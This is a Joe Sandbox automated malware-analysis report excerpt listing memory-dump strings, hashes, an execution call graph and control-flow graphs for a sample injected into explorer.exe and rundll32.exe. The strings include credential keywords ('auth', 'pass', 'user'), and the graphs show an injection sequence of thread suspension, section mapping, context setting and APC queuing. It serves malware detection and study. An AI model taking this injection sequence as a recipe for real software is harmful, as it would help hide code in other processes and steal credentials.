                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                • API String ID: 0-319646191
                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                • Instruction ID: f65e601af08d1693f73cce6e742b66b9db7624f99e0b08c6b1f4847eab167540
                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                • Instruction Fuzzy Hash: 1F31D431614B0D8FCB05EFA8C8847EDB7E4FB98205F40022AD54ED7292DF788649CB89
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                • API String ID: 0-319646191
                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                • Instruction ID: d634c449880eb67e32108809f1223577296c57523d04790dda1b943491b3dbf0
                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                • Instruction Fuzzy Hash: 4121E930610B0D8FCB05EFA8C4847ED7BE4FF98205F40421AD55AD7292DF788645CB89
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$l$l$t
                                • API String ID: 0-168566397
                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                • Instruction ID: f627a19ac6a8602d77224c0864a7fb416f3e76028ba91de970f155cccbb0e866
                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                • Instruction Fuzzy Hash: 4F217A70A24B0D9BDB48EFA8C4447EDBBF1FB58300F50462ED009D3652DB7895958B84
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$l$l$t
                                • API String ID: 0-168566397
                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                • Instruction ID: 5c74c8a7e7ee57650a83c335e6526cc7f22d3834aa3936a132ae2ef9e22e9225
                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                • Instruction Fuzzy Hash: 03217A70A24B0E9FDB48EFA8C0447AEBAF1FF58300F50462ED009D3652DB789595CB84
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: auth$logi$pass$user
                                • API String ID: 0-2393853802
                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                • Instruction ID: d5e9d723d70d81f6d67c7d30782c9d384c08be76489c667628ca16b2762ff9cc
                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                • Instruction Fuzzy Hash: A221C070614B0D8BCB06DF9998807EEB7E1EFC8344F054619E40AEB396D7B5E9148BC2

                                Execution Graph

                                Execution Coverage:1.7%
                                Dynamic/Decrypted Code Coverage:6.7%
                                Signature Coverage:0%
                                Total number of Nodes:624
                                Total number of Limit Nodes:69
                                execution_graph 108310 7af09d 108313 7ab9c0 108310->108313 108314 7ab9e6 108313->108314 108321 799d30 108314->108321 108316 7ab9f2 108317 7aba16 108316->108317 108329 798f30 108316->108329 108367 7aa6a0 108317->108367 108370 799c80 108321->108370 108323 799d3d 108324 799d44 108323->108324 108382 799c20 108323->108382 108324->108316 108330 798f57 108329->108330 108801 79b1b0 108330->108801 108332 798f69 108805 79af00 108332->108805 108334 798f86 108342 798f8d 108334->108342 108876 79ae30 LdrLoadDll 108334->108876 108336 7990f2 108336->108317 108338 798ffc 108821 79f400 108338->108821 108340 799006 108340->108336 108341 7abf80 2 API calls 108340->108341 108343 79902a 108341->108343 108342->108336 108809 79f370 108342->108809 108344 7abf80 2 API calls 108343->108344 108345 79903b 108344->108345 108346 7abf80 2 API calls 108345->108346 108347 79904c 108346->108347 108833 79ca80 108347->108833 108349 799059 108350 7a4a40 8 API calls 108349->108350 108351 799066 108350->108351 108352 7a4a40 8 API calls 108351->108352 108353 799077 108352->108353 108354 7990a5 108353->108354 108355 799084 108353->108355 108357 7a4a40 8 API calls 108354->108357 108843 79d610 108355->108843 108364 7990c1 108357->108364 108360 7990e9 108361 798d00 23 API calls 108360->108361 108361->108336 108362 799092 108859 798d00 108362->108859 108364->108360 108877 79d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108364->108877 108368 7aaf50 LdrLoadDll 108367->108368 108369 7aa6bf 108368->108369 108401 7a8bb0 108370->108401 108374 799ca6 108374->108323 108375 799c9c 108375->108374 108408 7ab2a0 108375->108408 108377 799ce3 108377->108374 108419 799aa0 108377->108419 108379 799d03 108425 799620 LdrLoadDll 108379->108425 108381 799d15 108381->108323 108774 7ab590 108382->108774 108385 7ab590 LdrLoadDll 108386 799c4b 108385->108386 108387 7ab590 LdrLoadDll 108386->108387 108388 799c61 108387->108388 108389 79f170 108388->108389 108390 79f189 108389->108390 108783 79b030 108390->108783 108392 79f19c 108787 7aa1d0 108392->108787 108396 79f1c2 108397 79f1ed 108396->108397 108793 7aa250 108396->108793 108399 7aa480 2 API calls 108397->108399 108400 799d55 108399->108400 108400->108316 108402 7a8bbf 108401->108402 108426 7a4e40 108402->108426 108404 799c93 108405 7a8a60 108404->108405 108432 7aa5f0 108405->108432 108409 7ab2b9 108408->108409 108439 7a4a40 108409->108439 108411 7ab2d1 108412 7ab2da 108411->108412 108478 7ab0e0 108411->108478 108412->108377 108414 7ab2ee 108414->108412 108496 7a9ef0 108414->108496 108752 797ea0 108419->108752 108421 799ac1 108421->108379 108422 799aba 108422->108421 108765 798160 108422->108765 108425->108381 108427 7a4e4e 108426->108427 108429 7a4e5a 108426->108429 108427->108429 108431 7a52c0 LdrLoadDll 108427->108431 108429->108404 108430 7a4fac 108430->108404 108431->108430 108435 7aaf50 108432->108435 108434 7a8a75 108434->108375 108436 7aaf5a 108435->108436 108437 7a4e40 LdrLoadDll 108436->108437 108438 7aaf82 108436->108438 108437->108438 108438->108434 108440 7a4d75 108439->108440 108442 7a4a54 108439->108442 108440->108411 108442->108440 108504 7a9c40 108442->108504 108444 7a4b63 108564 7aa450 LdrLoadDll 108444->108564 108445 7a4b80 108507 7aa350 108445->108507 108448 7a4b6d 108448->108411 108449 7a4ba7 108450 7abdb0 2 API calls 108449->108450 108451 7a4bb3 108450->108451 108451->108448 108452 7a4d39 108451->108452 108453 7a4d4f 108451->108453 108458 7a4c42 108451->108458 108454 7aa480 2 API calls 108452->108454 108573 7a4780 LdrLoadDll NtReadFile NtClose 108453->108573 108455 7a4d40 108454->108455 108455->108411 108457 7a4d62 108457->108411 108459 7a4ca9 108458->108459 108460 7a4c51 108458->108460 108459->108452 108461 7a4cbc 108459->108461 108462 7a4c6a 108460->108462 108463 7a4c56 108460->108463 108566 7aa2d0 108461->108566 108467 7a4c6f 108462->108467 108468 7a4c87 108462->108468 108565 7a4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108463->108565 108510 7a46e0 108467->108510 108468->108455 108522 7a4400 108468->108522 108470 7a4c60 108470->108411 108472 7a4d1c 108570 7aa480 108472->108570 108473 7a4c7d 108473->108411 108476 7a4c9f 108476->108411 108477 7a4d28 108477->108411 108479 7ab0f1 108478->108479 108480 7ab103 108479->108480 108591 7abd30 108479->108591 108480->108414 108482 7ab124 108594 7a4060 108482->108594 108484 7ab170 108484->108414 108485 7ab147 108485->108484 108486 7a4060 3 API calls 108485->108486 108488 7ab169 108486->108488 108488->108484 108626 7a5380 108488->108626 108489 7ab1fa 108490 7ab20a 108489->108490 108720 7aaef0 LdrLoadDll 108489->108720 108636 7aad60 108490->108636 108493 7ab238 108715 7a9eb0 108493->108715 108497 7aaf50 LdrLoadDll 108496->108497 108498 7a9f0c 108497->108498 108746 49a2c0a 108498->108746 108499 7a9f27 108501 7abdb0 108499->108501 108749 7aa660 108501->108749 108503 7ab349 108503->108377 108505 7aaf50 LdrLoadDll 108504->108505 108506 7a4b34 108505->108506 108506->108444 108506->108445 108506->108448 108508 7aaf50 LdrLoadDll 108507->108508 108509 7aa36c NtCreateFile 108508->108509 108509->108449 108511 7a46fc 108510->108511 108512 7aa2d0 LdrLoadDll 108511->108512 108513 7a471d 108512->108513 108514 7a4738 108513->108514 108515 7a4724 108513->108515 108517 7aa480 2 API calls 108514->108517 108516 7aa480 2 API calls 108515->108516 108518 7a472d 108516->108518 108519 7a4741 108517->108519 108518->108473 108574 7abfc0 LdrLoadDll RtlAllocateHeap 108519->108574 108521 7a474c 108521->108473 108523 7a444b 108522->108523 108524 7a447e 108522->108524 108526 7aa2d0 LdrLoadDll 108523->108526 108525 7a45c9 108524->108525 108529 7a449a 108524->108529 108527 7aa2d0 LdrLoadDll 108525->108527 108528 7a4466 108526->108528 108531 7a45e4 108527->108531 108530 7aa480 2 API calls 108528->108530 108532 7aa2d0 LdrLoadDll 108529->108532 108533 7a446f 108530->108533 108587 7aa310 LdrLoadDll 108531->108587 108534 7a44b5 108532->108534 108533->108476 108536 7a44bc 108534->108536 108537 7a44d1 108534->108537 108538 7aa480 2 API calls 108536->108538 108539 7a44ec 108537->108539 108540 7a44d6 108537->108540 108543 7a44c5 108538->108543 108550 7a44f1 108539->108550 108575 7abf80 108539->108575 108544 7aa480 2 API calls 108540->108544 108541 7a461e 108542 7aa480 2 API calls 108541->108542 108545 7a4629 108542->108545 108543->108476 108546 7a44df 108544->108546 108545->108476 108546->108476 108549 7a4557 108551 7a456e 108549->108551 108586 7aa290 LdrLoadDll 108549->108586 108557 7a4503 108550->108557 108578 7aa400 108550->108578 108553 7a458a 108551->108553 108554 7a4575 108551->108554 108556 7aa480 2 API calls 108553->108556 108555 7aa480 2 API calls 108554->108555 108555->108557 108558 7a4593 108556->108558 108557->108476 108559 7a45bf 108558->108559 108581 7abb80 108558->108581 108559->108476 108561 7a45aa 108562 7abdb0 2 API calls 108561->108562 108563 7a45b3 108562->108563 108563->108476 108564->108448 108565->108470 108567 7aaf50 LdrLoadDll 108566->108567 108568 7a4d04 108567->108568 108569 7aa310 LdrLoadDll 108568->108569 108569->108472 108571 7aaf50 LdrLoadDll 108570->108571 108572 7aa49c NtClose 108571->108572 108572->108477 108573->108457 108574->108521 108588 7aa620 108575->108588 108577 7abf98 108577->108550 108579 7aaf50 LdrLoadDll 108578->108579 108580 7aa41c NtReadFile 108579->108580 108580->108549 108582 7abb8d 108581->108582 108583 7abba4 108581->108583 108582->108583 108584 7abf80 2 API calls 108582->108584 108583->108561 108585 7abbbb 108584->108585 108585->108561 108586->108551 108587->108541 108589 7aaf50 LdrLoadDll 108588->108589 108590 7aa63c RtlAllocateHeap 108589->108590 108590->108577 108721 7aa530 108591->108721 108593 7abd5d 108593->108482 108595 7a4071 108594->108595 108596 7a4079 108594->108596 108595->108485 108597 7a434c 108596->108597 108724 7acf20 108596->108724 108597->108485 108599 7a40cd 108600 7acf20 2 API calls 108599->108600 108603 7a40d8 108600->108603 108601 7a4126 108604 7acf20 2 API calls 108601->108604 108603->108601 108732 7acfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 108603->108732 108733 7ad050 108603->108733 108607 7a413a 108604->108607 108606 7a4197 108608 7acf20 2 API calls 108606->108608 108607->108606 108610 7ad050 3 API calls 108607->108610 108609 7a41ad 108608->108609 108611 7a41ea 108609->108611 108613 7ad050 3 API calls 108609->108613 108610->108607 108612 7acf20 2 API calls 108611->108612 108614 7a41f5 108612->108614 108613->108609 108615 7ad050 3 API calls 108614->108615 108621 7a422f 108614->108621 108615->108614 108618 7acf80 2 API calls 108619 7a432e 108618->108619 108620 7acf80 2 API calls 108619->108620 108622 7a4338 108620->108622 108729 7acf80 108621->108729 108623 7acf80 2 API calls 108622->108623 108624 7a4342 108623->108624 108625 7acf80 2 API calls 108624->108625 108625->108597 108627 7a5391 108626->108627 108628 7a4a40 8 API calls 108627->108628 108629 7a53a7 108628->108629 108630 7a53e2 108629->108630 108631 7a53f5 108629->108631 108635 7a53fa 108629->108635 108632 7abdb0 2 API calls 108630->108632 108633 7abdb0 2 API calls 108631->108633 108634 7a53e7 108632->108634 108633->108635 108634->108489 108635->108489 108739 7aac20 108636->108739 108639 7aac20 LdrLoadDll 108640 7aad7d 108639->108640 108641 7aac20 LdrLoadDll 108640->108641 108642 7aad86 108641->108642 108643 7aac20 LdrLoadDll 108642->108643 108644 7aad8f 108643->108644 108645 7aac20 LdrLoadDll 108644->108645 108646 7aad98 108645->108646 108647 7aac20 LdrLoadDll 108646->108647 108648 7aada1 108647->108648 108649 7aac20 LdrLoadDll 108648->108649 108650 7aadad 108649->108650 108651 7aac20 LdrLoadDll 108650->108651 108652 7aadb6 108651->108652 108653 7aac20 LdrLoadDll 108652->108653 108654 7aadbf 108653->108654 108655 7aac20 LdrLoadDll 108654->108655 108656 7aadc8 108655->108656 108657 7aac20 LdrLoadDll 108656->108657 108658 7aadd1 108657->108658 108659 7aac20 LdrLoadDll 108658->108659 108660 7aadda 108659->108660 108661 7aac20 LdrLoadDll 108660->108661 108662 7aade6 108661->108662 108663 7aac20 LdrLoadDll 108662->108663 108664 7aadef 108663->108664 108665 7aac20 LdrLoadDll 108664->108665 108666 7aadf8 108665->108666 108667 7aac20 LdrLoadDll 108666->108667 108668 7aae01 108667->108668 108669 7aac20 LdrLoadDll 108668->108669 108670 7aae0a 108669->108670 108671 7aac20 LdrLoadDll 108670->108671 108672 7aae13 108671->108672 108673 7aac20 LdrLoadDll 108672->108673 108674 7aae1f 108673->108674 108675 7aac20 LdrLoadDll 108674->108675 108676 7aae28 108675->108676 108677 7aac20 LdrLoadDll 108676->108677 108678 7aae31 108677->108678 108679 7aac20 LdrLoadDll 108678->108679 108680 7aae3a 108679->108680 108681 7aac20 LdrLoadDll 108680->108681 108682 7aae43 108681->108682 108683 7aac20 LdrLoadDll 108682->108683 108684 7aae4c 108683->108684 108685 7aac20 LdrLoadDll 108684->108685 108686 7aae58 108685->108686 108687 7aac20 LdrLoadDll 108686->108687 108688 7aae61 108687->108688 108689 7aac20 LdrLoadDll 108688->108689 108690 7aae6a 108689->108690 108691 7aac20 LdrLoadDll 108690->108691 108692 7aae73 108691->108692 108693 7aac20 LdrLoadDll 108692->108693 108694 7aae7c 108693->108694 108695 7aac20 LdrLoadDll 108694->108695 108696 7aae85 108695->108696 108697 7aac20 LdrLoadDll 108696->108697 108698 7aae91 108697->108698 108699 7aac20 LdrLoadDll 108698->108699 108700 7aae9a 108699->108700 108701 7aac20 LdrLoadDll 108700->108701 108702 7aaea3 108701->108702 108703 7aac20 LdrLoadDll 108702->108703 108704 7aaeac 108703->108704 108705 7aac20 LdrLoadDll 108704->108705 108706 7aaeb5 108705->108706 108707 7aac20 LdrLoadDll 108706->108707 108708 7aaebe 108707->108708 108709 7aac20 LdrLoadDll 108708->108709 108710 7aaeca 108709->108710 108711 7aac20 LdrLoadDll 108710->108711 108712 7aaed3 108711->108712 108713 7aac20 LdrLoadDll 108712->108713 108714 7aaedc 108713->108714 108714->108493 108716 7aaf50 LdrLoadDll 108715->108716 108717 7a9ecc 108716->108717 108745 49a2df0 LdrInitializeThunk 108717->108745 108718 7a9ee3 108718->108414 108720->108490 108722 7aaf50 LdrLoadDll 108721->108722 108723 7aa54c NtAllocateVirtualMemory 108722->108723 108723->108593 108725 7acf30 108724->108725 108726 7acf36 108724->108726 108725->108599 108727 7abf80 2 API calls 108726->108727 108728 7acf5c 108727->108728 108728->108599 108730 7a4324 108729->108730 108731 7abdb0 2 API calls 108729->108731 108730->108618 108731->108730 108732->108603 108734 7acfc0 108733->108734 108735 7ad01d 108734->108735 108736 7abf80 2 API calls 108734->108736 108735->108603 108737 7acffa 108736->108737 108738 7abdb0 2 API calls 108737->108738 108738->108735 108740 7aac3b 108739->108740 108741 7a4e40 LdrLoadDll 108740->108741 108742 7aac5b 108741->108742 108743 7a4e40 LdrLoadDll 108742->108743 108744 7aad07 108742->108744 108743->108744 108744->108639 108745->108718 108747 49a2c1f LdrInitializeThunk 108746->108747 108748 49a2c11 108746->108748 108747->108499 108748->108499 108750 7aaf50 LdrLoadDll 108749->108750 108751 7aa67c RtlFreeHeap 108750->108751 108751->108503 108753 797eab 108752->108753 108754 797eb0 108752->108754 108753->108422 108755 7abd30 2 API calls 108754->108755 108762 797ed5 108755->108762 108756 797f38 108756->108422 108757 7a9eb0 2 API calls 108757->108762 108758 797f3e 108759 797f64 108758->108759 108761 7aa5b0 2 API calls 108758->108761 108759->108422 108763 797f55 108761->108763 108762->108756 108762->108757 108762->108758 108764 7abd30 2 API calls 108762->108764 108768 7aa5b0 108762->108768 108763->108422 108764->108762 108766 7aa5b0 2 API calls 108765->108766 108767 79817e 108766->108767 108767->108379 108769 7aaf50 LdrLoadDll 108768->108769 108770 7aa5cc 108769->108770 108773 49a2c70 LdrInitializeThunk 108770->108773 108771 7aa5e3 108771->108762 108773->108771 108775 7ab5b3 108774->108775 108778 79ace0 108775->108778 108777 799c3a 108777->108385 108780 79ad04 108778->108780 108779 79ad0b 108779->108777 108780->108779 108781 79ad40 LdrLoadDll 108780->108781 108782 79ad57 108780->108782 108781->108782 108782->108777 108784 79b053 108783->108784 108786 79b0d0 108784->108786 108799 7a9c80 LdrLoadDll 108784->108799 108786->108392 108788 7aaf50 LdrLoadDll 108787->108788 108789 79f1ab 108788->108789 108789->108400 108790 7aa7c0 108789->108790 108791 7aaf50 LdrLoadDll 108790->108791 108792 7aa7df LookupPrivilegeValueW 108791->108792 108792->108396 108794 7aa266 108793->108794 108795 7aaf50 LdrLoadDll 108794->108795 108796 7aa26c 108795->108796 108800 49a2ea0 LdrInitializeThunk 108796->108800 108797 7aa28b 108797->108397 108799->108786 108800->108797 108802 79b1b9 108801->108802 108803 79b030 LdrLoadDll 108802->108803 108804 79b1f4 108803->108804 108804->108332 108806 79af24 108805->108806 108878 7a9c80 LdrLoadDll 108806->108878 108808 79af5e 108808->108334 108810 79f39c 108809->108810 108811 79b1b0 LdrLoadDll 108810->108811 108812 79f3ae 108811->108812 108879 79f280 108812->108879 108815 79f3c9 108818 79f3d4 108815->108818 108819 7aa480 2 API calls 108815->108819 108816 79f3e1 108817 79f3f2 108816->108817 108820 7aa480 2 API calls 108816->108820 108817->108338 108818->108338 108819->108818 108820->108817 108822 79f42c 108821->108822 108898 79b2a0 108822->108898 108824 79f43e 108825 79f280 3 API calls 108824->108825 108826 79f44f 108825->108826 108827 79f459 108826->108827 108828 79f471 108826->108828 108830 79f464 108827->108830 108831 7aa480 2 API calls 108827->108831 108829 79f482 108828->108829 108832 7aa480 2 API calls 108828->108832 108829->108340 108830->108340 108831->108830 108832->108829 108834 79ca96 108833->108834 108835 79caa0 108833->108835 108834->108349 108836 79af00 LdrLoadDll 108835->108836 108837 79cb3e 108836->108837 108838 79cb64 108837->108838 108839 79b030 LdrLoadDll 108837->108839 108838->108349 108840 79cb80 108839->108840 108841 7a4a40 8 API calls 108840->108841 108842 79cbd5 108841->108842 108842->108349 108844 79d636 108843->108844 108845 79b030 LdrLoadDll 108844->108845 108846 79d64a 108845->108846 108902 79d300 108846->108902 108848 79908b 108849 79cbf0 108848->108849 108850 79cc16 108849->108850 108851 79b030 LdrLoadDll 108850->108851 108852 79cc99 108850->108852 108851->108852 108853 79b030 LdrLoadDll 108852->108853 108854 79cd06 108853->108854 108855 79af00 LdrLoadDll 108854->108855 108856 79cd6f 108855->108856 108857 79b030 LdrLoadDll 108856->108857 108858 79ce1f 108857->108858 108858->108362 108931 79f6c0 108859->108931 108861 798f25 108861->108317 108862 798d14 108862->108861 108936 7a4390 108862->108936 108864 798d70 108864->108861 108939 798ab0 108864->108939 108867 7acf20 2 API calls 108868 798db2 108867->108868 108869 7ad050 3 API calls 108868->108869 108872 798dc7 108869->108872 108870 797ea0 4 API calls 108870->108872 108872->108861 108872->108870 108874 79c7a0 18 API calls 108872->108874 108875 798160 2 API calls 108872->108875 108944 79f660 108872->108944 108948 79f070 21 API calls 108872->108948 108874->108872 108875->108872 108876->108342 108877->108360 108878->108808 108880 79f29a 108879->108880 108888 79f350 108879->108888 108881 79b030 LdrLoadDll 108880->108881 108882 79f2bc 108881->108882 108889 7a9f30 108882->108889 108884 79f2fe 108892 7a9f70 108884->108892 108887 7aa480 2 API calls 108887->108888 108888->108815 108888->108816 108890 7aaf50 LdrLoadDll 108889->108890 108891 7a9f4c 108890->108891 108891->108884 108893 7aaf50 LdrLoadDll 108892->108893 108894 7a9f8c 108893->108894 108897 49a35c0 LdrInitializeThunk 108894->108897 108895 79f344 108895->108887 108897->108895 108899 79b2c7 108898->108899 108900 79b030 LdrLoadDll 108899->108900 108901 79b303 108900->108901 108901->108824 108903 79d317 108902->108903 108911 79f700 108903->108911 108907 79d38b 108908 79d392 108907->108908 108922 7aa290 LdrLoadDll 108907->108922 108908->108848 108910 79d3a5 108910->108848 108912 79f725 108911->108912 108923 7981a0 108912->108923 108914 79d35f 108919 7aa6d0 108914->108919 108915 7a4a40 8 API calls 108917 79f749 108915->108917 108917->108914 108917->108915 108918 7abdb0 2 API calls 108917->108918 108930 79f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 108917->108930 108918->108917 108920 7aaf50 LdrLoadDll 108919->108920 108921 7aa6ef CreateProcessInternalW 108920->108921 108921->108907 108922->108910 108924 79829f 108923->108924 108925 7981b5 108923->108925 108924->108917 108925->108924 108926 7a4a40 8 API calls 108925->108926 108927 798222 108926->108927 108928 7abdb0 2 API calls 108927->108928 108929 798249 108927->108929 108928->108929 108929->108917 108930->108917 108932 7a4e40 LdrLoadDll 108931->108932 108933 79f6df 108932->108933 108934 79f6ed 108933->108934 108935 79f6e6 SetErrorMode 108933->108935 108934->108862 108935->108934 108949 79f490 108936->108949 108938 7a43b6 108938->108864 108940 7abd30 2 API calls 108939->108940 108943 798ad5 108940->108943 108941 798cea 108941->108867 108943->108941 108969 7a9870 108943->108969 108945 79f673 108944->108945 109017 7a9e80 108945->109017 108948->108872 108950 79f4ad 108949->108950 108956 7a9fb0 108950->108956 108953 79f4f5 108953->108938 108957 7a9fc6 108956->108957 108958 7aaf50 LdrLoadDll 108957->108958 108959 7a9fcc 108958->108959 108967 49a2f30 LdrInitializeThunk 108959->108967 108960 79f4ee 108960->108953 108962 7aa000 108960->108962 108963 7aaf50 LdrLoadDll 108962->108963 108964 7aa01c 108963->108964 108968 49a2d10 LdrInitializeThunk 108964->108968 108965 79f51e 108965->108938 108967->108960 108968->108965 108970 7abf80 2 API calls 108969->108970 108971 7a9887 108970->108971 108990 799310 108971->108990 108973 7a98a2 108974 7a98c9 108973->108974 108975 7a98e0 108973->108975 108976 7abdb0 2 API calls 108974->108976 108977 7abd30 2 API calls 108975->108977 108978 7a98d6 108976->108978 108979 7a991a 108977->108979 108978->108941 108980 7abd30 2 API calls 108979->108980 108981 7a9933 108980->108981 108986 7a9bd4 108981->108986 108996 7abd70 LdrLoadDll 108981->108996 108983 7a9bb9 108984 7a9bc0 108983->108984 108983->108986 108985 7abdb0 2 API calls 108984->108985 108987 7a9bca 108985->108987 108988 7abdb0 2 API calls 108986->108988 108987->108941 108989 7a9c29 108988->108989 108989->108941 108991 799335 108990->108991 108992 79ace0 LdrLoadDll 108991->108992 108993 799368 108992->108993 108994 79938d 108993->108994 108997 79cf10 108993->108997 108994->108973 108996->108983 108998 79cf3c 108997->108998 108999 7aa1d0 LdrLoadDll 108998->108999 109000 79cf55 108999->109000 109001 79cf5c 109000->109001 109008 7aa210 109000->109008 109001->108994 109005 79cf97 109006 7aa480 2 API calls 109005->109006 109007 79cfba 109006->109007 109007->108994 109009 7aaf50 LdrLoadDll 109008->109009 109010 7aa22c 109009->109010 109016 49a2ca0 LdrInitializeThunk 109010->109016 109011 79cf7f 109011->109001 109013 7aa800 109011->109013 109014 7aaf50 LdrLoadDll 109013->109014 109015 7aa81f 109014->109015 109015->109005 109016->109011 109018 7aaf50 LdrLoadDll 109017->109018 109019 7a9e9c 109018->109019 109022 49a2dd0 LdrInitializeThunk 109019->109022 109020 79f69e 109020->108872 109022->109020 109023 7a9070 109024 7abd30 2 API calls 109023->109024 109026 7a90ab 109024->109026 109025 7a918c 109026->109025 109027 79ace0 LdrLoadDll 109026->109027 109028 7a90e1 109027->109028 109029 7a4e40 LdrLoadDll 109028->109029 109031 7a90fd 109029->109031 109030 7a9110 Sleep 109030->109031 109031->109025 109031->109030 109034 7a8c90 LdrLoadDll 109031->109034 109035 7a8ea0 LdrLoadDll 109031->109035 109034->109031 109035->109031 109036 49a2ad0 LdrInitializeThunk 109040 47acb84 109043 47aa042 109040->109043 109042 47acba5 109044 47aa06b 109043->109044 109045 47aa182 NtQueryInformationProcess 109044->109045 109060 47aa56c 109044->109060 109047 47aa1ba 109045->109047 109046 47aa1ef 109046->109042 109047->109046 109048 47aa2db 109047->109048 109049 47aa290 109047->109049 109050 47aa2fc NtSuspendThread 109048->109050 109072 47a9de2 NtCreateSection NtMapViewOfSection NtClose 109049->109072 109052 47aa30d 109050->109052 109054 47aa331 109050->109054 109052->109042 109053 47aa2cf 109053->109042 109057 47aa412 109054->109057 109063 47a9bb2 109054->109063 109056 47aa531 109059 47aa552 NtResumeThread 109056->109059 109057->109056 109058 47aa4a6 NtSetContextThread 109057->109058 109062 47aa4bd 109058->109062 109059->109060 109060->109042 109061 47aa51c NtQueueApcThread 109061->109056 109062->109056 109062->109061 109064 47a9bf7 109063->109064 109065 47a9c66 NtCreateSection 109064->109065 109066 47a9ca0 109065->109066 109068 47a9d4e 109065->109068 109067 47a9cc1 NtMapViewOfSection 109066->109067 109067->109068 109069 47a9d0c 109067->109069 109068->109057 109069->109068 109070 47a9d88 109069->109070 109071 47a9dc5 NtClose 109070->109071 109071->109057 109072->109053

                                Control-flow Graph

                                APIs
                                • NtQueryInformationProcess.NTDLL ref: 047AA19F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID: 0
                                • API String ID: 1778838933-4108050209
                                • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                • Instruction ID: 5d5ed873d4c0c42b1e36a1822824a319900443863c87e7628797831c23abed77
                                • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                • Instruction Fuzzy Hash: 0BF15274918A4C8FDBA9EF68C898AEEB7E1FF98304F40462AD44ED7250DF34A551CB41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 209 47a9baf-47a9bef 210 47a9bf7-47a9bfe 209->210 211 47a9bf2 call 47a9102 209->211 212 47a9c0c-47a9c9a call 47ab942 * 2 NtCreateSection 210->212 213 47a9c00 210->213 211->210 219 47a9d5a-47a9d68 212->219 220 47a9ca0-47a9d0a call 47ab942 NtMapViewOfSection 212->220 214 47a9c02-47a9c0a 213->214 214->212 214->214 223 47a9d0c-47a9d4c 220->223 224 47a9d52 220->224 226 47a9d69-47a9d6b 223->226 227 47a9d4e-47a9d4f 223->227 224->219 228 47a9d88-47a9ddc call 47acd62 NtClose 226->228 229 47a9d6d-47a9d72 226->229 227->224 231 47a9d74-47a9d86 call 47a9172 229->231 231->228
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.4541190154.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_47a0000_rundll32.jbxd
                                Similarity
                                • API ID: Section$CloseCreateView
                                • String ID: @$@
                                • API String ID: 1133238012-149943524
                                • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                • Instruction ID: 208ad2b65e4bf5e2ab553e18898f16f8b55bc5f4a9d1b152650adc7e34f53d77
                                • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                • Instruction Fuzzy Hash: 776194B0118B088FCB58DF68D8856AABBE0FF98314F50062EE58AC3751DF35E451CB86

                                Control-flow Graph

                                • Executed
                                • Not Executed
